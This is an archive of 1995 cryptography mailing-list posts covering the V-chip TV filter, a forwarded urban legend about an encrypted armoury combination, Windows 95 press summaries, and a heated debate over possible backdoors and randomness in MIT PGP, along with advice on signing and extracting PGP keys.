31 Jul 95 11:13:27 PDT Subject: Sex & Crime TV filter Message-ID: I could agree to a private filtering mechanism where each program broadcasts an ID number. A chip on the set reads this info from the dark band between frames or someplace. Private agencies rate the programs by whatever criteria sells ("Bikinis & Beer", "Motherhood and Apple Pie", whatever), and people load those rating/show lookups into their set off of the net or wherever... Certainly the government shouldn't reqire anything. The government couldn't find its ass with both hands. I bet this scheme could sell on an information value-added basis alone. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rah at shipwright.com Mon Jul 31 11:17:51 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 31 Jul 95 11:17:51 PDT Subject: Customer Service? Message-ID: Veracity suspect, but an interesting crypto story nonetheless... >Subject: Tech support story (fwd) > >---------- Forwarded message ---------- > [Urban legend of the day...] > > Subject: Stressful tech call > To: Customer Service; TechSports > > This falls into the "Why did it have to happen on *MY* shift?" category. > > A friend of mine is a chief engineer at SuperMac, and he related this > story to me. > > SuperMac records a certain number of technical support calls at random, > to keep tabs on customer satisfaction. By wild "luck", they managed to > catch the following conversation on tape. > > Some poor SuperMac TechSport got a call from some middle level official > from the legitimate government of Trinidad. The fellow spoke very good > English, and fairly calmly described the problem. > > It seemed there was a coup attempt in progress at that moment. However, > the national armoury for that city was kept in the same building as the > Legislature, and it seems that there was a combination lock on the door > to the armoury. Of the people in the capitol city that day, only the > Chief of the Capitol Guard and the Chief Armourer knew the combination to > the lock, and they had already been killed. > > So, this officer of the government of Trinidad continued, the problem is > this. The combination to the lock is stored in a file on the Macintosh, > but the file has been encrypted with the SuperMac product called Sentinel. > Was there any chance, he asked, that there was a "back door" to the > application, so they could get the combination, open the armoury door, > and defend the Capitol Building and the legitimately elected government > of Trinidad against the insurgents? > > All the while he is asking this in a very calm voice, there is the sound > of gunfire in the background. The Technical Support guy put the person on > hold. A phone call to the phone company verified that the origin of the > call was in fact Trinidad. Meanwhile, there was this mad scramble to see > if anybody knew of any "back doors" in the Sentinel program. > > As it turned out, Sentinel uses DES to encrypt the files, and there was > no known back door. The Tech Support fellow told the customer that aside > from trying to guess the password, there was no way through Sentinel, and > that they'd be better off trying to physically destroy the lock. > > The official was very polite, thanked him for the effort, and hung up. > That night, the legitimate government of Trinidad fell. One of the BBC > reporters mentioned that the casualties seemed heaviest in the capitol, > where for some reason, there seemed to be little return fire from the > government forces. > > O.K., so they shouldn't have kept the combination in so precarious a > fashion. But it does place, "I can't see my Microsoft Mail server" > complaints in a different sort of perspective, does it not? > Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From fstuart at vetmed.auburn.edu Mon Jul 31 11:28:04 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Mon, 31 Jul 95 11:28:04 PDT Subject: Sex & Crime TV filter Message-ID: <199507311827.NAA25455@snoopy.vetmed.auburn.edu> [...] >The idea of boxes outside the TV is usually casually shot down >as unworkable; that kids, with their infinite time, patience, >cleverness, and guile, will find a way to bypass the box. >I'd say that it's worth a try. And, if it will blank [...] I hadn't thought of that before. I wonder how many kids will get zapped trying to bypass the chip on the inside. Frank Stuart | (Admiral Grace) Hopper's Law: fstuart at vetmed.auburn.edu | It's easier to get forgiveness than permission. From jya at pipeline.com Mon Jul 31 12:10:31 1995 From: jya at pipeline.com (John Young) Date: Mon, 31 Jul 95 12:10:31 PDT Subject: LOG_rol Message-ID: <199507311910.PAA20121@pipe1.nyc.pipeline.com> 7-31-95. NYPaper shredder Windows 95 confetti: "Windows of Opportunity for Microsoft." Windows 95 is already creating a stir in markets worldwide, in Washington and on Wall Street. The marketing squad is armed with a $150 million budget to help their new product become the most successful in computer software history. NYT_myr "The Customers: Computer Users Told To Go Slow in Change Of Operating Systems." "There aren't too many reasons to change right now." For Mr. Mott's clients, some of whom have hundreds of PC's, changing to the new operating system would be disruptive and expensive and fraught with the minor technical glitches common in the first iteration of any software. WOA_nag "The Rival: Bracing for a Microsoft Onslaught, Apple Sees No reason to Panic." A growing chorus of pundits and Wall Street analysts has zeroed in on Apple as the biggest potential loser in the wake of the introduction of Windows 95. There is another view within the industry, however, that holds that the computer maker is not in danger. APE_duk "On The Net: The real significance of Windows 95 is reaching the Web with a single click of the mouse." The real significance of Windows 95 is as a distribution vehicle for a simple icon, or symbol, on the computer screen. With the icon, the user connects to the MSN, and from there to the Internet. And that is where the real money lies. RER_edg "Haven't heard of Windows 95? Where have you been hiding?" To introduce Windows 95, the Microsoft Corporation is amassing almost every weapon in the advertising arsenal, like teaser ads to entice consumers into anticipating the computer operating system as much as a Super Bowl or a birthday party. SOP_sud 5 ez: LOG_rol From tcmay at sensemedia.net Mon Jul 31 12:15:03 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 31 Jul 95 12:15:03 PDT Subject: Sex & Crime TV filter Message-ID: At 6:13 PM 7/31/95, Robert Hettinga wrote: >I could agree to a private filtering mechanism where each program >broadcasts an ID number. > >A chip on the set reads this info from the dark band between frames or >someplace. > >Private agencies rate the programs by whatever criteria sells ("Bikinis & >Beer", "Motherhood and Apple Pie", whatever), and people load those >rating/show lookups into their set off of the net or wherever... > >Certainly the government shouldn't reqire anything. The government couldn't >find its ass with both hands. I bet this scheme could sell on an >information value-added basis alone. The "VCR-Plus" codes that are already published essentially offer this code already. Thus, one looks in the channel lisings and finds "Debbie Does Fort Meade" has a VCR-Plus code of "31415926," which one enters to set recording times, etc. (This even has some low-level crypto content, as the VCRPlus coding system was a topic of much debate a couple of years ago.) True, this takes work. (Though some satellite systems offer it via a point-and-click interface, on the actual t.v. screen.) The key difference between this setup and the "in band" proposal RAH is making is that VCR-Plus is "out of band." But the point is that the info is there in both cases. The infrastructure for using this to block stuff doesn't exist in most t.v.s or VCRs, but then it wouldn't exist either with RAH's in-band program labelling approach (which I expect is coming anyway--my cable system reports on what network it's seeing, even as the networks alter lineups, and reports time, system status, etc....all presumably in the 4-line interval, etc.) What's really flawed about these "lockout" schemes is that the installed base of televisions and VCRs is NOT going to go away, that no magic wand is going to give a single mother who wants to control what her children watch a new t.v. or VCR. As some non-stupid Senators noted, the V-chip system will go into the households who need it the _least_! --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From warlord at MIT.EDU Mon Jul 31 12:26:05 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 31 Jul 95 12:26:05 PDT Subject: your mail In-Reply-To: <9507311434.AA25514@all.net> Message-ID: <199507311925.PAA28281@toxicwaste.media.mit.edu> Hey, Doc... > The term paranoid is inappropriate in this context. Paranoia refers to > an irrational fear, while I am expressing a rational concern over a > system that has been taken over by a (partially) government funded > university and which has not been properly verified. The history of > cryptography (as they say) is (quite literally) littered with the dead > bodies of people killed because somebody else thought a cryptosystem was > good enough when it was not. If you are concerned that someone put a whole or backdoor in PGP, then go grab the source and take a look for yourself. Thats why the code is available. If you can't understand it, then you probably have no real right to complain! However if you are still paranoid (and yes, I do believe this is an irrational fear, being the person who maintains the MIT PGP development sources) then go find someone who can understand it and ask them. As a side note, PGP does not go out of its way to choose "good" primes over other primes. Take a look at genprime.c and read the comment near the top of the file. It explains why. -derek From ghio at cmu.edu Mon Jul 31 13:36:58 1995 From: ghio at cmu.edu (Matthew Ghio) Date: Mon, 31 Jul 95 13:36:58 PDT Subject: ssh protocol In-Reply-To: <199507310737.JAA06792@cnam.fr> Message-ID: <9507312036.AA08394@toad.com> Tatu Ylonen wrote: > The basic idea behind the protocol goes roughly like this: > 1. Exchange session keys using Diffie-Hellman > 2. Each side sends a signature of the Diffie-Hellman exchange (the > signature can be with any of a number of algorithms; RSA and > Elliptic Curve systems have been defined). I've been playing with the cryptotcp program available from utopia.. It has some bugs but works pretty well, if you don't mind waiting 20-30 seconds at the beginning. It does a Diffie-Hellman exchange and 3DES over telnet. How hard would it be to add some sort of authentication to this program? From yusuf921 at uidaho.edu Mon Jul 31 13:50:00 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Mon, 31 Jul 95 13:50:00 PDT Subject: your mail In-Reply-To: <199507311925.PAA28281@toxicwaste.media.mit.edu> Message-ID: This might be a minor thing, but could people posting to the mailing list please make sure that the Subject line doesn't say "re: your mail". it really slows me down to have to check manually what the actual subject was or if it was directed to ME but put my addres in the cc instead of the To. Thankyou. Syed Yusuf http://www.uidaho.edu/~yusuf921 From qfh1 at crux3.cit.cornell.edu Mon Jul 31 14:40:33 1995 From: qfh1 at crux3.cit.cornell.edu (Quazi F. Haque) Date: Mon, 31 Jul 95 14:40:33 PDT Subject: LOG_rol In-Reply-To: <199507311910.PAA20121@pipe1.nyc.pipeline.com> Message-ID: Quazi F Haque | Those that can give up essential liberty to obtain a little qfh1 at cornell.edu | temporary safety deserve neither liberty nor safety. - BF From jya at pipeline.com Mon Jul 31 15:14:20 1995 From: jya at pipeline.com (John Young) Date: Mon, 31 Jul 95 15:14:20 PDT Subject: Rosenberging Mumia Message-ID: <199507312213.SAA23343@pipe4.nyc.pipeline.com> Responding to msg by jlasser at rwd.goucher.edu (Jon Lasser) on Mon, 31 Jul 12:43 PM >On Mon, 31 Jul 1995, Timothy C. May wrote: > >> The Rosenbergs were certainly the Mumia Abu Jamals of >their day. > >The Mumia case (something friends of mine are more than >peripherally acquainted with) seems to be very much in >doubt. Of course, they'll kill him anyway, probably. >But I suggest reading E.L. Doctrow's essay on the >subject from the NYT of several weeks (months? >possibly) back. ------------ In addition to Doctorow's OpEd piece, there have been three recent NYPaper articles on the case and a half-page ad. Here's a judicious benchwarmer from the July 30 article: Judge Albert F. Sabo of Common Pleas Court, who conducted Mr. Abu-Jamal's first contentious trial, is presiding over his hearing for a new trial, and defense lawyers contend that not much has changed. Judge Sabo, a retired member of the Fraternal Order of Police, has sent more people to death row than any judge in the state. In the current hearing he has been openly contemptuous of the defense. "Objection is over-ruled, whatever it was," the judge told Mr. Abu-Jamal's lead lawyer, Leonard I. Weinglass, a veteran of some of the most politically charged trials of recent decades, including that of the Chicago Eight after the 1968 Democratic Convention. Judge Sabo has sustained virtually every prosecution objection while shooting down almost every defense objection. At one point, when Mr. Weinglass asked for a four-minute recess to locate a crucial witness, Judge Sabo, looking at his watch, said, "It's ten-twenty-eight-and-a- half. You have until 10:30." On Wednesday, the first day of the hearing, Judge Sabo turned his back and walked out of the courtroom as another defense lawyer, Rachel H. Wolkenstein, was addressing him about a legal issue. He came back a few minutes later, saying that he could not hear because of the noise coming from the street, where a large group of Mr. Abu-Jamal's supporters were chanting, "Free Mumia now." Richard B. Costello, the president of the Philadelphia Fraternal Order of Police, said he did not understand why Mr. Abu-Jamal's plight had drawn so much attention and big- league legal help. "He has more lawyers than Snow White had dwarfs," Mr. Costello said. "There's nothing special about this guy. He's a cop killer. We've had cop killers before, and, unfortunately, we'll have them again." Although Judge Sabo has frequently urged the defense to hurry, he interrupted the proceedings for several minutes to argue and reminisce with a baffled witness about the location of a swimming pool in his old neighborhood sometime around "1926 or '28." As he talked about the pool, a woman in the audience jumped to her feet and shouted, "Aren't we here to talk about a man's life?" She was escorted from the courtroom. Minutes later, the judge asked another question about the pool. Several of Mr. Abu-Jamal's supporters were removed for refusing to stand when Judge Sabo entered and another was taken outside for giving the judge a Nazi-style salute. ---------- To eye the outcry, send a blank msg with subject: MUM_fry. From fc at all.net Mon Jul 31 15:59:19 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 15:59:19 PDT Subject: a hole in PGP In-Reply-To: <199507311925.PAA28281@toxicwaste.media.mit.edu> Message-ID: <9507312253.AA27941@all.net> > > Hey, Doc... > > > The term paranoid is inappropriate in this context. Paranoia refers to > > an irrational fear, while I am expressing a rational concern over a > > system that has been taken over by a (partially) government funded > > university and which has not been properly verified. The history of > > cryptography (as they say) is (quite literally) littered with the dead > > bodies of people killed because somebody else thought a cryptosystem was > > good enough when it was not. > > If you are concerned that someone put a whole or backdoor in PGP, then > go grab the source and take a look for yourself. Thats why the code > is available. If you can't understand it, then you probably have no > real right to complain! However if you are still paranoid (and yes, I > do believe this is an irrational fear, being the person who maintains > the MIT PGP development sources) then go find someone who can > understand it and ask them. > > As a side note, PGP does not go out of its way to choose "good" primes > over other primes. Take a look at genprime.c and read the comment > near the top of the file. It explains why. My assertion regarding weakness of the key generation algorithm was not related to the response you gave. As a result, it appears that you are avoiding the issue. This looks bad if you are, as you claim, maintaining a legitimate algorithm. Perhaps you would be better served by addressing the specifics of my comments - to wit: What makes you think PGPs method of getting seeds does not lead to a limited key space that is within the realm of modern computers to search? Your assertion that I could find the backdoor by inspecting the program is the wrong tactic for secure programs. If you want people to believe that a program is secure, you had better come up with good reasons that it is secure, and not hide behind "if you can't find any holes, it must be secure". Clever back doors are not accomplished by an obvious program change, but rather by the subtle use of some technique that appears to do one thing when it actually does something else. As a good example, a subtle interation with the rest of the environment could modify the key generation algorithm after it is loaded. Unfortunately, PGP is too large to verify against such back doors, so I ask again: Why (specifically) do you think the MIT version of PGP has no backdoors and is not subject to attacks such as the one outlined in my previous posting? -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From rah at shipwright.com Mon Jul 31 16:23:22 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 31 Jul 95 16:23:22 PDT Subject: a hole in PGP Message-ID: At 6:53 PM 7/31/95, Dr. Fred said: > Why (specifically) do you think the MIT version of PGP has no >backdoors and is not subject to attacks such as the one outlined in my >previous posting? I've been watching this gark long enough, I think. Look. If you're qualified, look at the PGP source and vet it yourself. If you aren't qualified, figure the market to be efficient in this instance and assume the stuff works. Stop wasting our time and bandwidth harassing the MIT folk about whether or not their code is clean. Such posturing won't wash around here. Seriously, it may be an appeal to authority, but it can safely be assumed that PGP is clean, and that MIT is *not* involved with the NSA and the Red Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats postings. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From jfmesq at ibm.net Mon Jul 31 16:39:18 1995 From: jfmesq at ibm.net (James F. Marshall) Date: Mon, 31 Jul 95 16:39:18 PDT Subject: Public Key Confusion Message-ID: <199507312339.XAA100594@smtp-gw01.ny.us.ibm.net> I am a very confused over my PGP public key(s). I have signed my public key and this is shown in a verbose listing of my public keyring. The same date appears in my public keyring for my public key as in my secret keyring for my secret key. The .asc file for my public key has the same file date (per a file-manager program). SOURCE OF CONFUSION: when I extract my public key from my public keyring and insert the extracted public key into a message, the public key that is inserted is bigger than and different from the public key in the .asc file. Am I correct to assume that the .asc version is a good public key but *unsigned*, and that the larger public key extracted from my public keyring is the same public key but has the additional component of my signature built into the body of, or seemlessly incorporated into, or otherwise coupled with, my public key? People to whom I have sent the smaller .asc version of my public key have sent me messages encrypted with that key, and I have been able to decrypt them with no apparent problem. My confusion arose when someone suggested that I sign my own public key, I clearsigned it (I know, duh!), and PGP and a public key server could not find a key block in the clearsigned message because the clearsigning put "- " at the start of both PGP block delimiters. Should I just stop distributing the .asc version and only let people have the longer version extracted from my public keyring? Is that the properly signed copy? Tampering can be ruled out as a practical matter. -- Best Regards, Jim From warlord at MIT.EDU Mon Jul 31 16:40:47 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 31 Jul 95 16:40:47 PDT Subject: a hole in PGP In-Reply-To: <9507312253.AA27941@all.net> Message-ID: <199507312340.TAA02533@toxicwaste.media.mit.edu> > Your assertion that I could find the backdoor by inspecting the > program is the wrong tactic for secure programs. If you want people to > believe that a program is secure, you had better come up with good > reasons that it is secure, and not hide behind "if you can't find any > holes, it must be secure". This is where you are very wrong. I am not saying that "if you can't find any holes it must be secure". What I am saying is that the source is available, and thousands of people have looked at the source, and none of them have found any holes in it. > - to wit: What makes you think PGPs method > of getting seeds does not lead to a limited key space that is within the > realm of modern computers to search? How do you propose that a user's keystrokes can be analyzed? If you assume that the PC's internal clock speed >> typing speed (which is a good assumption -- how many keystrokes/second can you type?) then you have a large amount of randomness that can be gained from timing keystrokes. Even a good typist will not have an even typestroke! Have you read RFC 1750? If not, I would recommend you read it before you consider continuing this thread! > Why (specifically) do you think the MIT version of PGP has no > backdoors and is not subject to attacks such as the one outlined in my > previous posting? I think it has no backdoors because Jeff Schiller and I (among others) have looked closely at the random number generator code (he has taken a much closer look than I) and believe it to be secure. I also know that I did not put any backdoors into the code (but why would you believe me, I must be paid by the government to say this, right?) As to why I believe it is not subject to attack, I ask you again to go read RFC 1750. PGP follows its recommendations fairly closely. There is only one place where PGP fails to follow, and that is that PGP does expose the bucket of random bits, rather than mixing them before exporting them. However I do not believe that this would affect the generation of PGP Public Keys. -derek PS: In what field is your Doctorate? From shamrock at netcom.com Mon Jul 31 16:42:02 1995 From: shamrock at netcom.com (Lucky Green) Date: Mon, 31 Jul 95 16:42:02 PDT Subject: Sex & Crime TV filter Message-ID: <199507312339.TAA10743@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , tcmay at sensemedia.net (Timothy C. May) wrote: >However, to help derail this V-chip being mandated, what if we (I mean >activists, writers of columns, etc.) "insisted" that _commercials_ be >similarly labelled? I love it. Great idea, Tim! - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMB1pgCoZzwIn1bdtAQFwRgF/YBsyqIwF34uxmZgxwzSfTeVcxOtnYe+J ISSPgnB97QQqPUjYF0oO7T70wLXVwL21 =MEBo -----END PGP SIGNATURE----- From shamrock at netcom.com Mon Jul 31 16:43:54 1995 From: shamrock at netcom.com (Lucky Green) Date: Mon, 31 Jul 95 16:43:54 PDT Subject: Sex & Crime TV filter Message-ID: <199507312341.TAA10813@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199507311827.NAA25455 at snoopy.vetmed.auburn.edu>, fstuart at vetmed.auburn.edu (Frank Stuart) wrote: >I hadn't thought of that before. I wonder how many kids will get >zapped trying to bypass the chip on the inside. Not half as many as will be arrested and convicted for "illegal consumption of adult TV while underage" once bypassing such chip will ineviably made a crime. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMB1qGyoZzwIn1bdtAQFiSQF/WUIZE345ZeNS7sy90zMUaZ9OoagnJSmn VV2ZwXq20Ch+kbUmDTjf70twbKnu/i29 =s8TG -----END PGP SIGNATURE----- From warlord at MIT.EDU Mon Jul 31 16:54:53 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 31 Jul 95 16:54:53 PDT Subject: Public Key Confusion In-Reply-To: <199507312339.XAA100594@smtp-gw01.ny.us.ibm.net> Message-ID: <199507312354.TAA02802@toxicwaste.media.mit.edu> When you want to sign a key, you should use "pgp -ks". You should never clearsign a public key -- it buys you absolutely nothing other than saying that "I saw this key at some point, and this message (which is a public key block) came from me". Have you signed your own key using "pgp -ks"? Have you extracted your key (using "pgp -kxa") since you signed it? Or did you only extract it before you signed it? This would be the cause of the confusion. If you sign a key, the signature gets attached to the key certificate. However you do not need that signature in order to _use_ the key. So, people to whom you gave your key without a signature can still use that key, it just doesn't have your signature on it. As for the keyserver, it _ONLY_ accepts keys; if you clearsign your key before you send it, then you are not sending a key, you are sending a message that contains a key. This is not the same thing. That is why the keyserver rejected it. > Should I just stop distributing the .asc version and only let people > have the longer version extracted from my public keyring? Is that the > properly signed copy? If you performed the pgp -ks, then you should re-perform the pgp -kxa and distribute the newly extracted key. I hope this answers all your questions. All of this, and more, should be explained in the PGP Documentation which is included with PGP. Good Luck. -derek From nobody at replay.com Mon Jul 31 16:55:08 1995 From: nobody at replay.com (Name Withheld by Request) Date: Mon, 31 Jul 95 16:55:08 PDT Subject: Sex & Crime TV filter Message-ID: <199507312355.BAA22631@utopia.hacktic.nl> > Yesterday I heard in the radio that someone in America has developed > some device which darkens the TV screen if there is sex or crime on TV. > Does anyone know whether this is true and how it works? It's called the 'Off' switch... From stewarts at ix.netcom.com Mon Jul 31 17:02:37 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 31 Jul 95 17:02:37 PDT Subject: Sex & Crime TV filter Message-ID: <199508010000.RAA28911@ix3.ix.netcom.com> >Yesterday I heard in the radio that someone in America has developed >some device which darkens the TV screen if there is sex or crime on TV. It's the "V-Chip" for blocking television programs marked as "Violent" by the broadcasters, which some politicians are proposing to require that all TV makers install in new TVs and all broadcasters label all programs. The descriptions in the press have made it sound like there's one bit of control info, which would be very stupid; multiple bits would at least allow parents to block programs separately for violence/sex/nudity/nasty-words/political-correctness. That would also be offensive, and more likely to be used. Unlike VCR-plus, which is a complex hash of the time and channel for a given program (complexity included so you have to buy TV Guide magazine), any V-chip codes could be handled automatically. (Also, V-chip is designed to turn the TV off, while VCR-plus is designed to turn the recorder on. If the designers were clever, the V-chip mechanism can probably also block video-tapes with V-chip codes?) If somebody wanted to develop a free-market rating service, the most convenient mechanism would probably be to broadcast VCR-plus codes with detailed information about programs to a set-top box, so you could sell features like - block speeches by annoying politicians - record all football matches but not other sports events - record the closed captioning from infomercials and parse for telephone numbers so you can order things automatically! - turn on the Nintendo whenever Barney the Dinosaur is on. Blocking commercials would be fun, but would probably be illegal :-), or at least stations that supported it would have trouble getting advertisers. (It would almost certainly be illegal to block the "Enhanced Underwriting" on public broadcasting, since otherwise you wouldn't get to hear "The Environmental Correctness Show has been brought to you by a grant from BigOil corporation, lubricating the Alaskan shoreline for 15 years!".) #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/ From fc at all.net Mon Jul 31 17:14:30 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 17:14:30 PDT Subject: a hole in PGP In-Reply-To: Message-ID: <9508010008.AA02790@all.net> > > At 6:53 PM 7/31/95, Dr. Fred said: > > Why (specifically) do you think the MIT version of PGP has no > >backdoors and is not subject to attacks such as the one outlined in my > >previous posting? > > > > I've been watching this gark long enough, I think. > > Look. If you're qualified, look at the PGP source and vet it yourself. If > you aren't qualified, figure the market to be efficient in this instance > and assume the stuff works. One of the several points I tried (apparently unsuccessfully) to make is that with a program that large, it is impractical to verify that there are no subtle back doors - regardless of how knowledgeable or skilled you or I may be. Your "assumption of security" perspective is an inappropriate one unless you are trying to get people to use something that is not secure. > Stop wasting our time and bandwidth harassing the MIT folk about whether or > not their code is clean. Such posturing won't wash around here. The headers on the postings allow you to ignore them, but in the meanwhile, the subject matter is in line with this forum, and the questions are legitimate. You will have to do better than to appeal to authority to convince anyone that MIT's version of PGP is secure. > > > Seriously, it may be an appeal to authority, but it can safely be assumed > that PGP is clean, and that MIT is *not* involved with the NSA and the Red > Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats > postings. Why (specifically) do you think so? Because you claim it? Because the MIT maintainer claims it? You say MIT is not associated with the NSA, but they have historically been funded by the NSA and other federal agencies for work on information security. Do you really think that the only information protected by PGP is dirty pictures? Do you somehow think that MIT and the NSA are above that sort of thing? All you have to do is look at history, and it should be clear that this appeal to authority is often used by those trying to cover things up. If you know something about PGPs security that you aren't telling us, don't beat around the bush about it. Come out and say it. Tell us that you have proven that PGP has no backdoors and what method you used to do that. Tell us that you have hand verified all the code and that none of it overwrites the key generation process and tell us how you verified it. It cannot be safely assumed that any program is clean or that any one person or group is not involved with intentionally subverting security. That violates the fundamental principles of information protection. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From rah at shipwright.com Mon Jul 31 17:37:01 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 31 Jul 95 17:37:01 PDT Subject: a hole in PGP Message-ID: At 8:08 PM 7/31/95, Dr. Fred said: >it is impractical to verify that there >are no subtle back doors Ah. I knew my undergraduate philosophy degree from good ol' Mizzou would come in handy some day. In the sophistry biz, the above is an informal fallacy. It's called a disproving a negative, more popularly called the "Flying Saucer" fallacy, as in, "prove to me that flying saucers (or PGP trap-doors) don't exist". I would put the rest of your rejoinder in the same class of tinker-toy logic, Doc. You're testing my patience. Feeling flush from my New Orleans road trip, I went out and bought the commercial version of Eudora, filter-feature and all, which means I'm just itching to test it. In other words, it means you are flirting with the kill-file, the bozo-filter, more rudely, a . Play nice, Doc, or don't play at all. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From pjm at ionia.engr.sgi.com Mon Jul 31 17:50:20 1995 From: pjm at ionia.engr.sgi.com (Patrick May) Date: Mon, 31 Jul 95 17:50:20 PDT Subject: Sex & Crime TV filter In-Reply-To: <199508010000.RAA28911@ix3.ix.netcom.com> Message-ID: <199508010050.RAA19664@ionia.engr.sgi.com> -----BEGIN PGP SIGNED MESSAGE----- Bill Stewart writes: > Blocking commercials would be fun, but would probably be illegal :-), > or at least stations that supported it would have trouble getting > advertisers. Actually, there was a story in the San Jose Mercury News a couple of weeks ago regarding a product that does just that. VCRs from at least two manufacturers will contain a chip and/or firmware that detects commercials and does not record them. My dim memories from a project I did for Sony a couple of years ago are that commercials are separated by a fixed number of black frames and some, at least, have tracking information encoded so that advertisers can monitor how often they are played. I'll try to dig up more info. Regards, Patrick May -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMB16QO5Yg08fDKehAQHcgAP/c9OCy/jIKXdjDPjfifPHfK9tqRO8EWNY cAoPH418Otur0jaORTEoyuMwcuZcApm4yzsF+5teLi2p+y/BhAPNH9dSMLNGnVuQ GUkvKJIHapYyR8dlY+d2AsJWOi3jBCTTt1Spog+3uGcx5ry8ROK91Xr3XUNntcyG w2bG06dL44c= =KY6i -----END PGP SIGNATURE----- From fc at all.net Mon Jul 31 17:56:16 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 17:56:16 PDT Subject: a hole in PGP In-Reply-To: <199507312340.TAA02533@toxicwaste.media.mit.edu> Message-ID: <9508010049.AA05263@all.net> > > Your assertion that I could find the backdoor by inspecting the > > program is the wrong tactic for secure programs. If you want people to > > believe that a program is secure, you had better come up with good > > reasons that it is secure, and not hide behind "if you can't find any > > holes, it must be secure". > > This is where you are very wrong. I am not saying that "if you can't > find any holes it must be secure". What I am saying is that the > source is available, and thousands of people have looked at the > source, and none of them have found any holes in it. History shows that your approach fails. Here are some examples: Tens of thousands of people had source to the http daemon from CERN, and yet none of them noticed a hole that was detected as it was being exploited only a few months ago. Tens of thousands of people have access to sendmail and yet new holes are found by attackers several times per year on average. Tens of thousands of people have access to the sources of various versions of hundreds of software packages, yet there are holes found every day. > > - to wit: What makes you think PGPs method > > of getting seeds does not lead to a limited key space that is within the > > realm of modern computers to search? > > How do you propose that a user's keystrokes can be analyzed? If you > assume that the PC's internal clock speed >> typing speed (which is a > good assumption -- how many keystrokes/second can you type?) then you > have a large amount of randomness that can be gained from timing > keystrokes. Even a good typist will not have an even typestroke! > Have you read RFC 1750? If not, I would recommend you read it before > you consider continuing this thread! Request for Comments: 1750 - Randomness Recommendations for Security "...Choosing random quantities to foil a resourceful and motivated adversary is surprisingly difficult. ...recommends the use of truly random hardware techniques and shows that the existing hardware on many systems can be used for this purpose." PGP does not use "truly random hardware techniques" "...For the present, the lack of generally available facilities for generating such unpredictable numbers is an open wound in the design of cryptographic software. ... the only safe strategy so far has been to force the local installation to supply a suitable routine to generate random numbers. To say the least, this is an awkward, error-prone and unpalatable solution." - 1994 - after PGP was implemented. and then: "This informational document suggests techniques for producing random quantities that will be resistant to such attack. It recommends that future systems include hardware random number generation or provide access to existing hardware that can be used for this purpose." "...Systems like Kerberos, PEM, PGP, etc. are maturing and becoming a part of the network landscape [PEM]. These systems provide substantial protection against snooping and spoofing. However, there is a potential flaw. At the heart of all cryptographic systems is the generation of secret, unguessable (i.e., random) numbers. " (Internet RFCs are searchable at http://all.net) So I guess the RFC supports my contention and not yours. > > Why (specifically) do you think the MIT version of PGP has no > > backdoors and is not subject to attacks such as the one outlined in my > > previous posting? > > I think it has no backdoors because Jeff Schiller and I (among others) > have looked closely at the random number generator code (he has taken > a much closer look than I) and believe it to be secure. I also know > that I did not put any backdoors into the code (but why would you > believe me, I must be paid by the government to say this, right?) You might be, but even if you are not, that doesn't mean there are no back doors. Your inability to detect a backdoor gives me little confidence, since this is at least an NP-complete problem and, with all due respect, today, nobody can prove that PGP is free of backdoors > As to why I believe it is not subject to attack, I ask you again to go > read RFC 1750. 